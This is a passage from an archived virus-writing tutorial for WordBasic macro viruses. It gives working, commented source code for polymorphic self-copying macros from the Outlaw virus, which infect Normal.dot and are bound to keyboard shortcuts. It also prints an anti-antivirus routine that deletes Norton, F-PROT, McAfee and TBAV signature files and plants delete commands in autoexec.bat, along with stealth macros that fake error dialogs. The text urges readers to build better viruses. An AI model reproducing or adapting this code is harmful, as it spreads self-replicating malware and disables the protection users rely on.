i.e. if the generated number is "12345" it actually is " 12345". There is a function that deletes that open space. Its Ltrim. You will see how it works in the example.

I hope you get it, and else don't worry but read the file again. And now , the moment you've all been waiting for :) the code for making a polymorfic macro virus.

This is an example of the code the Outlaw virus uses.

---------The Macro for creating random names---------------
Sub MAIN
On Error Goto Done                      '<Error handler.>

A$ = FileName$()                        '<A$ = active filename.>
If A$ = "" Then Goto Finish             '<If no file active goto finish.>

If CheckInstalled = 0 Then              '<Already installed?...>
        Routine                         '<No then goto Sub Routine,
        Crypt                           ' Sub Crypt, Sub PayLoadMakro,
        PayloadMakro                    ' etc.>
        FileSaveAll 1, 1
Else                                    '<Yes (already installed).>
        Goto Done                       '<Goto done.>
End If

Done:                                   '<Done (already installed).>
A$ = FileName$()                        '<A$ = active filename.>
If A$ = "" Then                         '<If no file active goto finish.>
        Goto Finish
Else                                    '<If a file is active,
        Insert " "                      ' insert a "space", for infecting
                                        ' the active file.>
End If


Finish:                                 '<Finish (no file active).>
End Sub

Sub Crypt                               '<The Sub Crypt.>
One = 7369                              '<Number one is 7369.>
Two = 9291                              '<Number two is 9291.>
Num = Int(Rnd() * (Two - One) + One)    '<generate random number.>
A$ = Str$(Num)                          '<A$ is generated number.>
A$ = LTrim$(A$)                         '<Delete the empty space before...
                                        ' the number. The empty space is...
                                        ' for making the number negative,
                                        ' e.g. -7369.>

Beginn = Hour(Now())                    '<Beginn is the active hour.>
B$ = Str$(Beginn)                       '<B$ is the active hour (string).>
B$ = LTrim$(B$)                         '<Delete the empty space in B$.>

If B$ = "1" Then C$ = "A"               '<If B$ is 1 (1 o'clock)...
                                        ' then C$ is A.>
If B$ = "2" Then C$ = "B"               '<If B$ is 2 (2 o'clock)...
                                        ' then C$ is B.>
If B$ = "3" Then C$ = "C"               '<If B$ is 3 (3 o'clock)...
                                        ' then C$ is C.>
If B$ = "4" Then C$ = "D"               '<Etc.>
If B$ = "5" Then C$ = "E"
If B$ = "6" Then C$ = "F"
If B$ = "7" Then C$ = "G"
If B$ = "8" Then C$ = "H"
If B$ = "9" Then C$ = "I"
If B$ = "10" Then C$ = "J"
If B$ = "11" Then C$ = "K"
If B$ = "12" Then C$ = "L"
If B$ = "13" Then C$ = "M"
If B$ = "14" Then C$ = "N"
If B$ = "15" Then C$ = "O"
If B$ = "16" Then C$ = "P"
If B$ = "17" Then C$ = "Q"
If B$ = "18" Then C$ = "R"
If B$ = "19" Then C$ = "S"
If B$ = "20" Then C$ = "T"
If B$ = "21" Then C$ = "U"
If B$ = "22" Then C$ = "V"
If B$ = "23" Then C$ = "W"
If B$ = "00" Then C$ = "X"

E$ = C$ + A$                            '<E$ is C$ (character) plus...
                                        ' A$ (the generated number).>
ZU$ = GetDocumentVar$("VirNameDoc")     '<ZU$ is macro called VirNameDoc...
                                        ' Watch out:VirNameDoc is not...
                                        ' the real macro name, it's some...
                                        ' sort of string.>
PG$ = WindowName$() + ":" + ZU$         '<PG$ is active filename plus...
                                        ' ":" and plus macro name (ZU$).>
MacroCopy PG$, "Global:" + E$           '<Copies macro from document...
                                        ' to global template, with...
                                        'the name that was generated.>
SetProfileString "Intl", "Name2", E$    '<Set the macro name in...
                                        ' win.ini. as "Intl", "Name2", E$.>
ToolsCustomizeKeyboard .KeyCode = 69, .Category = 2, .Name = E$, .Add, .Context = 0
                                        '<Creates short-cut with the...
                                        ' ascii keycode 69 (E). If the...
                                        ' E key is pushed the macro...
                                        ' E$ will be executed (The above...
                                        ' macro). With the .Add you tell...
                                        ' Word that you want to add that...
                                        ' function to the key not replace...
                                        ' it.>

End Sub                                 '<End the Sub Crypt>



Sub Routine                             '<Begin Sub Routine>
One = 7369                              '<This is practically...
Two = 9291                              ' the same as Sub Crypt.>
Num = Int(Rnd() * (Two - One) + One)    '<I will only explain the...
A$ = Str$(Num)                          ' things that aren't...
A$ = LTrim$(A$)                         ' explained above.>

Beginn = Hour(Now())
B$ = Str$(Beginn)
B$ = LTrim$(B$)

If B$ = "1" Then C$ = "A"
If B$ = "2" Then C$ = "B"
If B$ = "3" Then C$ = "C"
If B$ = "4" Then C$ = "D"
If B$ = "5" Then C$ = "E"
If B$ = "6" Then C$ = "F"
If B$ = "7" Then C$ = "G"
If B$ = "8" Then C$ = "H"
If B$ = "9" Then C$ = "I"
If B$ = "10" Then C$ = "J"
If B$ = "11" Then C$ = "K"
If B$ = "12" Then C$ = "L"
If B$ = "13" Then C$ = "M"
If B$ = "14" Then C$ = "N"
If B$ = "15" Then C$ = "O"
If B$ = "16" Then C$ = "P"
If B$ = "17" Then C$ = "Q"
If B$ = "18" Then C$ = "R"
If B$ = "19" Then C$ = "S"
If B$ = "20" Then C$ = "T"
If B$ = "21" Then C$ = "U"
If B$ = "22" Then C$ = "V"
If B$ = "23" Then C$ = "W"
If B$ = "00" Then C$ = "X"

D$ = C$ + A$                            '<The same as in Sub Crypt...
UZ$ = GetDocumentVar$("VirName")        ' only with other names.>
GP$ = WindowName$() + ":" + UZ$
MacroCopy GP$, "Global:" + D$
SetProfileString "Intl", "Name", D$
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = D$, .Add, .Context = 0
                                        '<This one creates a short-cut...
                                        ' with the D$ macro (this macro)...
                                        ' if the spacebar (keycode 32)...
                                        ' is pushed.>

End Sub

Sub PayloadMakro                        '<Same again.>
One = 7369
Two = 9291
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)

Beginn = Hour(Now())
B$ = Str$(Beginn)
B$ = LTrim$(B$)

If B$ = "1" Then C$ = "A"
If B$ = "2" Then C$ = "B"
If B$ = "3" Then C$ = "C"
If B$ = "4" Then C$ = "D"
If B$ = "5" Then C$ = "E"
If B$ = "6" Then C$ = "F"
If B$ = "7" Then C$ = "G"
If B$ = "8" Then C$ = "H"
If B$ = "9" Then C$ = "I"
If B$ = "10" Then C$ = "J"
If B$ = "11" Then C$ = "K"
If B$ = "12" Then C$ = "L"
If B$ = "13" Then C$ = "M"
If B$ = "14" Then C$ = "N"
If B$ = "15" Then C$ = "O"
If B$ = "16" Then C$ = "P"
If B$ = "17" Then C$ = "Q"
If B$ = "18" Then C$ = "R"
If B$ = "19" Then C$ = "S"
If B$ = "20" Then C$ = "T"
If B$ = "21" Then C$ = "U"
If B$ = "22" Then C$ = "V"
If B$ = "23" Then C$ = "W"
If B$ = "00" Then C$ = "X"

K$ = C$ + A$                            '<Again another name.>
ZUZ$ = GetDocumentVar$("VirNamePayload")
GP$ = WindowName$() + ":" + ZUZ$
MacroCopy GP$, "Global:" + K$
SetProfileString "Intl", "Name3", K$    '<Only this time no...
                                        ' short-cut because this...
                                        ' is the payloadmacro and...
                                        ' this payload macro is only...
                                        ' executed on a special date...
                                        ' that is programmed in...
                                        ' another macro. For the...
                                        ' whole Outlaw virus, see...
                                        ' the virii section.>
End Sub

Function CheckInstalled                 '<A function to check if...
                                        ' the virus already installed...
                                        ' the global template (Normal.Dot).>
CC$ = GetProfileString$("Intl", "Name") '<CC$ is the name of the Routine...
                                        ' macro (Sub Routine).>
    CheckInstalled = 0                  '<Set the var checkinstalled to 0.>
    If CountMacros(0) > 0 Then          '<If the number of macros in...
                                        ' Normal.Dot is greater then 0,
        For i = 1 To CountMacros(0)     ' then create a for...next loop...
                                        ' that loops the number of macros.>
            If MacroName$(i, 0) = CC$ Then    '<If the macro name in...
                CheckInstalled = 1      ' Normal.dot is CC$ (routine...
                                        ' macro) then set var...
                                        ' CheckInstalled to 1.>
            End If                      '<Ends the If instruction.>
        Next i                          '<All macros done? then...
                                        ' continue. Else go back to...
                                        ' for...next loop.>
    End If                              '<Ends the If instruction.>
End Function                            '<The end of the function.>
----------------------------------------------------------------

You see this isn't as complicated as you may have thought. The only complicated thing is the saving of the macro names in the win.ini. About that, if you want to use the generated macro names in another macro, you must read the macro names from win.ini. This is done by typing: UZ$ = GetProfileString$("Intl", "Name") It's best to set this at the top of the macro. But if the virus contains more then two macros (Outlaw does) you must set another line in your macro. Just below the UZ$ = getprof... you type: ZU$ = GetProfileString$("Intl", "Name2") ZUZ$ = GetProfileString$("Intl", "Name3") Only, be awrare if you didn't use Intl and Name1, Name2, etc. you must change the names. But now UZ$, ZU$ and ZUZ$ contains the macro names. So you could use something like:

infDoc$ = FileName()
Macrocopy "Global:" + UZ$, InfDoc$ + ":" + generated name

This is just simple polymorfism. What you can do to improve your polymorfism is:

Making more generatable names is quite easy, because you could just make the number higher. For example:

Instead of using this:

One = 7369
Two = 9291
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)

You could use this:

One = 1000000
Two = 9999999
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)

Real simple, isn't it?

Now the second thing. How to make sure that a generated name doesn't comes twice. You could use:

One = 1000
Two = 2000
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)

And for the next macro:

One = 2001
Two = 3000
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)

And so on...

See? But instead of using the numbers you could also use the characters: You could use:

Beginn = Hour(Now())
B$ = Str$(Beginn)
B$ = LTrim$(B$)

If B$ = "1" Then C$ = "AA"
If B$ = "2" Then C$ = "BB"
If B$ = "3" Then C$ = "CC"
If B$ = "4" Then C$ = "DD"
If B$ = "5" Then C$ = "EE"
If B$ = "6" Then C$ = "FF"
If B$ = "7" Then C$ = "GG"
If B$ = "8" Then C$ = "HH"
If B$ = "9" Then C$ = "II"
If B$ = "10" Then C$ = "JJ"
If B$ = "11" Then C$ = "KK"
If B$ = "12" Then C$ = "LL"
If B$ = "13" Then C$ = "MM"
If B$ = "14" Then C$ = "NN"
If B$ = "15" Then C$ = "OO"
If B$ = "16" Then C$ = "PP"
If B$ = "17" Then C$ = "QQ"
If B$ = "18" Then C$ = "RR"
If B$ = "19" Then C$ = "SS"
If B$ = "20" Then C$ = "TT"
If B$ = "21" Then C$ = "UU"
If B$ = "22" Then C$ = "VV"
If B$ = "23" Then C$ = "WW"
If B$ = "00" Then C$ = "XX"

And the next time:

Beginn = Hour(Now())
B$ = Str$(Beginn)
B$ = LTrim$(B$)

If B$ = "1" Then C$ = "AB"
If B$ = "2" Then C$ = "BC"
If B$ = "3" Then C$ = "CD"
If B$ = "4" Then C$ = "DE"
If B$ = "5" Then C$ = "EF"
If B$ = "6" Then C$ = "FG"
If B$ = "7" Then C$ = "GH"
If B$ = "8" Then C$ = "HI"
If B$ = "9" Then C$ = "IJ"
If B$ = "10" Then C$ = "JK"
If B$ = "11" Then C$ = "KL"
If B$ = "12" Then C$ = "LM"
If B$ = "13" Then C$ = "MN"
If B$ = "14" Then C$ = "NO"
If B$ = "15" Then C$ = "OP"
If B$ = "16" Then C$ = "PQ"
If B$ = "17" Then C$ = "QR"
If B$ = "18" Then C$ = "RS"
If B$ = "19" Then C$ = "ST"
If B$ = "20" Then C$ = "TU"
If B$ = "21" Then C$ = "UV"
If B$ = "22" Then C$ = "VW"
If B$ = "23" Then C$ = "WX"
If B$ = "00" Then C$ = "XY"

So easy i'm falling asleap, tell me something i cannot think by myself!

Ok, i'll try... and now how not to use the time for generating the first character.

Instead of using:

One = 7369
Two = 9291
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)

Beginn = Hour(Now())
B$ = Str$(Beginn)
B$ = LTrim$(B$)

use this:

One = 7369
Two = 9291
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)

One = 0
Two = 23
Num = Int(Rnd() * (Two - One) + One)
B$ = Str$(Num)
B$ = LTrim$(B$)

I said:"TELL ME SOMETHING I CANNOT THINK BY MYSELF!!!"...

Anti-anti-virus (retro) in macro virii

It's quite simple to attack Non-Resident Anti-virus software, just delete or rename a specific file and your AV progi won't work anymore. Most of the time the user will reinstall the product so if you put a line in autoexec.bat that deletes or renames the file if it exists again the technique is quite useful. But I didn't discovered yet how to avoid the memory-resident AV software.

Here is some example I used in my Puritan (1) virus. The Puritan (1) virus is just a bad rip off concept virus, but with retro techniques and simple stealth, but eh don't blame me for having two days time to create a virus and a new technique so the virus contains some bugs, but the virus will be continued. There's the (1) for. Here is a piece of the Puritan (1) virus to demonstrate a new technique to attack non-resident AV software.

'-----------------------------------------------------------
'The AutoOpen macro.
'This is used for executing the Retro Macro, the macro with
'the retro technique in it. It will only be executed one time,
'At infection, because if Normal.Dot is already infected the
'macro will jump to Z and will not execute the Retro Macro again.
'This retro technique is only used for AV software in Win95 because
'I hadn't the time to get other AV progi's and to add them. Check
'the VBB magazine's for more from this.
'-----------------------------------------------------------
Sub MAIN
        On Error Goto Z                 'This is actually the same...
        iM = CountMacros(0, 0)          'as the concept virus. For...
        For i = 1 To M                  'a full explained Puritan (1)...
                If M$(i, 0, 0) = "Puritan" Then Y = - 1
                End If                  'virus, choose virii--->Puritan(1).
        Next i

        If Not Y Then
                F$ = WindowsName$()
        S$ = F$ + ":Puritan"
                MacroCopy S$, "Global:Puritan"
        S$ = F$ + ":Rtr"
                MacroCopy S$, "Global:Retro"
        S$ = F$ + ":FSAB"
                MacroCopy S$, "Global:FileSaveAs"
        S$ = F$ + ":FSAB"
                MacroCopy S$, "Global:FSAB"
        S$ = F$ + ":AOB"
                MacroCopy S$, "Global:AOB"
        S$ = F$ + ":ToolsMacro"
                MacroCopy S$, "Global:ToolsMacro"
        End If

ToolsMacro .Name = "Retro", .Run, .Show = 0, .Discription = "", .NewName = ""
                        'This will execute the macro Retro in Normal.Dot.

Z:

End Sub

'---------------
'The Retro Macro
'---------------

Sub MAIN

'Norton AntiVirus

On Error Goto                           'Error Handler.
VF$ = "C:\Program Files\Norton AntiVirus\Virscan.Dat"
                                        'VF$ (Virus File) is Virscan.dat.
If Files$(VF$) = "" Then Goto a         'If VF$ (Virscan.dat) doesn't...
                                        'exists goto a.
SetAttr VF$, 0                          'If it exists set the attributes...
                                        'to zero (no attributes).
Kill VF$                                'Then delete the file.
                                        'The next time you will start...
                                        'your AV progi it cannot scan...
                                        'any files.

a:
On Error Goto c                         'Error Handler.
AB$ = "C:\Autoexec.bat"                 'AB$ (AutoExec.bat) is C:\Autoexec.bat.
If Files$(AB$) = "" Then Goto c         'If AB$ (AutoExec.bat) doesn't...
                                        'exists goto c.
SetAttr AB$, 0                          'If it exists set the attributes...
                                        'to zero (no attributes).

Open AB$ For Append As #1               'Then open AB$ (AutoExec.bat)...
                                        'for appending.
Print #1, "@echo off"                   'Put the line "@Echo Off" at the...
                                        'end of the AutoExec.bat.
Print #1, "IF exist " + VF$ + " then del " + VF$
                                        'Then Put the line 'IF exist...
                                        '"C:\Program Files\Norton AntiVirus\
                                        'Virscan.dat" then del "C:\Program
                                        'Files\Norton AntiVirus\Virscan.Dat"

Close #1                                'Close the AutoExec.bat


'----------------------------
'F-PROT W95

c:                                      'This is just the same as above...
On Error Goto d                         'Only with F-PROT for W95.
VF$ = "C:\Program Files\F-Prot95\Fpwm32.dll"
If Files$(VF$) = "" Then Goto d
SetAttr VF$, 0
Kill VF$

d:
AB$ = "C:\Autoexec.bat"
If Files$(AB$) = "" Then Goto f
SetAttr AB$, 0
Open AB$ For Append As #1
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1


'----------------------------
'MCAFEE W95

f:
On Error Goto g
VF$ = "C:\Program Files\McAfee\Scan.dat"
If Files$(VF$) = "" Then Goto g
SetAttr VF$, 0
Kill VF$

g:
AB$ = "C:\Autoexec.bat"
If Files$(AB$) = "" Then Goto h
SetAttr AB$, 0
Open AB$ For Append As #1
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1


'----------------------------
'TBAV W95

h:
On Error Goto i
VF$ = "C:\Tbavw95\Tbscan.sig"
If Files$(VF$) = "" Then Goto i
SetAttr VF$, 0
Kill VF$

i:
AB$ = "C:\Autoexec.bat"
If Files$(AB$) = "" Then Goto j
SetAttr AB$, 0
Open AB$ For Append As #1
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1


J:

Z:
End Sub
'----------------------------------------------------------

Ok, yet it's only for 4 AV-programs but I know you can make lots of more routines such as these. But if you cannot watch out for our next issue and in the meantime make sure to look at the VBB magazines for more from us about this.

If anyone has an idea how to defeat TSR-AV programs e-mail me.

[email protected]

Different stealth techiques in macro virii

I wasn't planning to make something real big from this so it's probably a bit short. You'll get a few examples but that's it.

Most of the time the macros that take care of the stealth technique are named ToolsMacro (In the English version of Word) because if it's put in ToolsMacro it's automatticly executed when the user selects Tools-->Macro from the menu.

Here are a couple examples:

-----------------------------------------------------------
Sub MAIN
        On Error Goto ErrorRoutine

        OldName$ = NomFichier$()

        If macros.bDebug Then
                MsgBox "start ToolsMacro"
                Dim dlg As OutilsMacro
                If macros.bDebug Then MsgBox "1"
                GetCurValues dlg
                If macros.bDebug Then MsgBox "2"
                On Error Goto Skip
                Dialog dlg
                OutilsMacro dlg
Skip:
        On Error Goto ErrorRoutine
        End If

        REM enable automacros
        DisableAutoMacros 0

        macros.SavToGlobal(OldName$)
        macros.objectiv
        Goto Done

ErrorRoutine:
        On Error Goto Done
        If macros.bDebug Then
                MsgBox "error " + Str$(Err) + " occurred"
        End If

Done:
End Sub
-----------------------------------------------------------

This one is from 'the macro virus writing tuturial' from Dark Night.

Or you could use:

-----------------------------------------------------------
Sub MAIN
Dim dlg As OutilsMacro
GetCurValues dlg
On Error Resume Next

Diag$ = "0"
Section$ = "Compatibility"
wininistr$ = "0x0020401"
ProfileName$ = "RR2CD"
PrintText$ = "Brought to you by the Nemesis Corporation, 1996"
Password$ = Chr$(120) + Chr$(101) + Chr$(110) + Chr$(105) + Chr$(120) +
                                                      Chr$(111) + Chr$(115)

NoVir$ = GetProfileString$(Section$, ProfileName$)
If (NoVir$ = wininistr$) Or (diag$ = "1") Then
   Dialog dlg
   OutilsMacro dlg
Else
   MsgBox "This option is not available right now.", "Warning", 48
End If

End Sub
-----------------------------------------------------------

This one is from the Nemesis (Xenixos) virus. I've changed it a bit.

And finally to give another example, from the MooNRaiDer virus.

-----------------------------------------------------------
Sub MAIN
Dim ComboBox1$(0)
ComboBox1$(0) = ""
Dim ListBox1$(0)
ListBox1$(0) = ""
Dim DropListBox2$(0)
DropListBox2$(0) = "Normal.dot"
Begin Dialog UserDialog 442, 320, "Macro"
        PushButton 290, 14, 141, 21, "Rec&ord...", .Definierbar2
        CancelButton 290, 43, 141, 21
        PushButton 290, 72, 141, 21, "&Run", .Definierbar3
        PushButton 290, 102, 141, 21, "&Edit", .Definierbar4
        PushButton 290, 130, 141, 21, "&Delete", .Definierbar5
        PushButton 290, 166, 141, 21, "Or&ganizer...", .Definierbar6
        ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1
        Text 6, 223, 93, 13, "Macros &Available In:", .Text1
        Text 7, 259, 109, 13, "Descr&iption:", .Text2
        Text 7, 6, 93, 13, "Macros:", .Text3
        ListBox 7, 276, 425, 38, ListBox1$(), .ListBox1
        DropListBox 6, 238, 425, 19, DropListBox2$(), .ListBox2
End Dialog

Redim dlg As UserDialog
x = Dialog(dlg)
Select Case x
Case 0
Cancel
Case 1
MsgBox "Not enough memory", "WordBasic Err = 7"
Case 2
MsgBox "Not enough memory", "WordBasic Err = 7"
Case 3
MsgBox "Not enough memory", "WordBasic Err = 7"
Case 4
MsgBox "Not enough memory", "WordBasic Err = 7"
Case 5
MsgBox "Not enough memory", "WordBasic Err = 7"
End Select
End Sub
-----------------------------------------------------------

Ok, I know it isn't anything more then just some stolen macros but maybe you get some inspiration from this and you will end up creating the perfect macro virus, who knows...

--- Neophyte ---

[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua